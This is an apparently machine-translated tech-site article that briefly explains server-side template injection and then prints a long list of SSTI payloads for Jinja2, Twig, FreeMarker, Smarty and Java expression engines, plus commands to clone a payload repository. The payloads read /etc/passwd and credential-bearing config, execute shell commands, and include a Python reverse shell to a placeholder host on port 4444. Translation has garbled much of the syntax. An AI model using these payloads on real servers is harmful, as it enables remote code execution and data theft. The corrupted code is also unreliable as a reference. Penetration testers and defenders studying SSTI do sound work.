Shulou(Shulou.com)05/31 Report--

Editor to share with you the example analysis of SSTI-Payloads, I believe that most people do not know much about it, so share this article for your reference, I hope you can learn a lot after reading this article, let's go to know it!

Server-side template injection

The so-called server-side template injection technology means that an attacker can use native template syntax to inject Payload into a template and then execute it on the server side. Server template injection (SSTI) is an attack that uses the server-side template of the common Web framework as an attack medium. this attack takes advantage of the weakness of the user input method embedded in the template. in addition, the SSTI attack can also be used to find out the content structure of Web applications.

According to the technical design and implementation, the template engine can combine fixed templates and dynamic data to generate specific web pages. If the user's input data is directly connected to the template content, rather than passed in directly as data parameters, a server-side template injection attack may occur. At this point, the attacker will be able to maliciously operate on the template engine by injecting arbitrary template instructions, which will generally cause the attacker to gain full control of the target network server. In other words, server-side template injection Payload needs to be deployed and used on the target server, which will make them more serious than normal client-side template injection vulnerabilities.

Vulnerability impact

Server-side template injection vulnerabilities expose websites to a variety of attacks and security risks, depending on the template engine being discussed and how applications use it. In some rare cases, these vulnerabilities do not pose a real security risk. In most cases, however, the impact of server-side template injection can be catastrophic.

In some serious cases, an attacker can implement remote code execution on the target server, take full control of the back-end server, and use it to perform the next attack on the internal infrastructure of the network.

Even when it is not possible to fully execute remote code, attackers can usually use server-side template injection as a springboard for many other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.

Payload set {{2x2}} [[3room3]] {{3room3} {{dump (app)}} {{app.request.server.all | join (') ')} {{config.items ()}} {{[] .class.base.subclasses ()} {' .class.mro () [1] .subclasses ()}} {{'. _ class__.__mro__ [2]. _ subclasses__ ()}} {% for key Value in config.iteritems ()%} {{key | e}} {{value | e}} {% endfor%} {{request}} {{self}} ${ex ("id")} [# assign ex = 'freemarker.template.utility.Execute'?new ()] ${ex (' id')} ${"freemarker.template.utility.Execute"? new () ("id")} {{app.request.query.filter {'options':'system'})} {{'. _ class__.__mro__ [2]. _ _ subclasses__ () [40] ('/ etc/passwd'). Read ()} {{config.items () [4] [1]. _ class__.__mro__ [2]. _ subclasses__ () [40] ("/ etc/passwd"). Read ()}} {{'. _ class _ .mro () [1]. _ _ subclasses__ () [396] ('cat flag.txt' Shell=True Stdout=-1) .communicate () [0] .strip ()} {{config.__class__.__init__.__globals__ ['os'] .popen (' ls'). Read ()} {% for x in (). _ _ class__.__base__.__subclasses__ ()%} {% if "warning" in x.strip ()} {{x (). _ module.__builtins__ ['_ _ import__'] ('os') .popen (request.args.input) .read ()} {% endif%} {% endfor%} {$smarty.version} {php} echo `id` {/ php} {{['id'] | filter (' system')} {{['cat$IFS/etc/passwd'] | filter (' system')}} {{['cat$IFS/etc/passwd'] | filter (' system')} {{request | attr ([_ "* 2," class "," _ "* 2] | join)} {{request | attr ([" _ _ "," class ")} "_ _" | join)} {{request | attr ("_ class__")}} {{request.__class__} {{request | attr ('application') | attr ('\ x5f\ x5fglobals\ x5f\ x5f\ x5f') | attr ('\ x5f\ x5fgetitem\ x5f\ x5f') ('\ x5f\ x5fbuiltins\ x5f\ x5f') | attr ('\ x5f\ x5fgetitem\ x5f\ x5f') ('\ x5f\ x5fimport\ x5f\ x5f') ('os') | attr (' popen') ('id') ) | attr ('read') ()} {{' a'.getClass (). ForName ('javax.script.ScriptEngineManager'). NewInstance (). GetEngineByName (' JavaScript'). Eval (\ "new java.lang.String ('xxx')\")} {{' a'.getClass (). ForName ('javax.script.ScriptEngineManager'). NewInstance (). GetEngineByName (' JavaScript'). Eval (\ "var x=new java.lang.ProcessBuilder). X.command (\\ "whoami\\"); x.start ()}} {{'a'.getClass (). ForName (' javax.script.ScriptEngineManager'). NewInstance (). GetEngineByName ('JavaScript'). Eval (\ "var x=new java.lang.ProcessBuilder; x.command (\\" netstat\\ ") Org.apache.commons.io.IOUtils.toString (x.start (). GetInputStream ())\ ")} {{'a'.getClass (). ForName (' javax.script.ScriptEngineManager'). NewInstance (). GetEngineByName ('JavaScript'). Eval (\" var x=new java.lang.ProcessBuilder; x.command (\\ "uname\\",\ "- a\\") Org.apache.commons.io.IOUtils.toString (x.start (). GetInputStream ())\ ")} {% for x in (). _ _ class__.__base__.__subclasses__ ()%} {% if" warning "in x. Module.__builtins__ ['_ import__'] ('os'). Popen (" python3-c' import socket,subprocess,os ") S=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect ((\ "ip\", 4444)); os.dup2 (s.fileno (), 0); os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call ([\ "/ bin/cat\",\ "flag.txt\"]) '"). Read (). Zfill (417)} {% endif%} {% endfor%} ${T (java.lang.System). Getenv ()} ${T (java.lang.Runtime). GetRuntime (). Exec (' cat etc/passwd')} ${T (org.apache.commons.io.IOUtils) .toString (T (java.lang.Runtime). GetRuntime (). Exec (T (java.lang.Character) .toString (99) .concat (T (java.lang.Character)) .toString (97) .concat (T (java.lang.Character) .toString (32)) .concat (T (java.lang.Character) .toString (47)) .concat (T (java.lang.Character) .toString (47)) .concat (T (java.lang.Character) .toString (116)) .concat (T (java.lang.Character) .toString (99)) .concat (T (java.lang.Character)). ToString (47) .concat (T (java.lang.Character) .toString) .concat (T (java.lang.Character) .toString (97)) .concat (T (java.lang.Character) .toString (115) .concat (T (java.lang.Character) .toString (115)) .concat (T (java.lang.Character) .toString) .concat (T (java.lang.Character). ToString (100)). GetInputStream ()} Payload download

Researchers can use the following commands to clone existing Payload sets locally (HTTPS):

Root@ismailtasdelen:~# git clone https://github.com/payloadbox/ssti-payloads.git

Researchers can use the following commands to clone existing Payload sets locally (SSH):

Root@ismailtasdelen:~# git clone git@github.com:payloadbox/ssti-payloads.git above is all the content of this article "sample Analysis of SSTI-Payloads". Thank you for reading! I believe we all have a certain understanding, hope to share the content to help you, if you want to learn more knowledge, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.